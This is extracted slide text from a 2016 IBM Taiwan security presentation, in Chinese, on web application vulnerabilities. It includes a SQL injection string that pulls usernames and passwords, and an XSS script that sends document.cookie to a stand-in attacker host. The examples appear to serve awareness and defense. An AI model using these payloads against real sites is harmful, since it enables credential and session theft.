《IBM Innovate 2016-B_3 Innovate TW 2016_提升防骇实力 V1.0》.pdf

提升防駭實力 軟體開發更要有內力 陳家豪 (Max Chen) 台灣 IBM公司軟體事業處 Rational技術顧問 歡迎來到智慧的地球 (Smarter Planet) Our world is getting Instrumented Our world is getting Interconnected Our world is getting Intelligent 3 迎接智慧的地球我們將面對的挑戰 Key drivers for security projects 與日俱增的 不斷增加的 要確保符合 複雜度 支出 法規要求 很快地 ,世界會有超過 美國企業對於企業風 據統計, 美國企業為 一兆個裝置連接,構成 險與遵規管理的支出 每筆被駭客竊取的客 所謂的物聯網 已達到 三百億美金,台 戶資料 ,要付出 214美 (internet of things) 灣企業也不斷地增加 金的代價 ,台灣呢 ? 相關預算 Source /news/article/0,289142,sid195_gci1375707,00.html Web應用程式的漏洞是最重要的風險來源 根據X-Force的統計 ,在所有類型的漏洞中, 49%是 Web應用程式的漏洞 即便很多人對其已不算陌生 , Cross-Site Scripting和 SQL injection仍 然長年位居Web 應用程式漏洞的 Top 2 IBM XFORCE Year-End 2010 Trend Report 範例 : SQL Injection 盜取帳戶資料 範例 : SQL Injection 盜取帳戶資料 改輸入 01/01/2006 union select userid,null,username+,+password,null from users-- 範例 : SQL Injection 盜取帳戶資料 交易明細查詢 竟變成 帳號密碼查詢 範例 : Cross-site Scripting (XSS) 範例 : Cross-site Scripting (XSS) 哦 ?變粗體了 這個查詢欄位可以 用來執行程式耶 範例 : Cross-site Scripting (XSS) 在查詢欄位輸入 scriptdocument.write(img src=http://evilsite/+document.cookie);/script 使用者的session資料無聲無息被送往駭客的電腦 嘿嘿 …接下來只要想辦法騙別人連這個網址就好了 更多應該關注應用程式安全性的理由 •因駭客攻擊導致資料外洩的案例中 , 89%和 SQL Injection有關 • 應遵循 PCI 安全標準的受害組織中,有 79%被發現沒有遵規 (non-compliant) • 被駭客竊取的資料中 ,有 92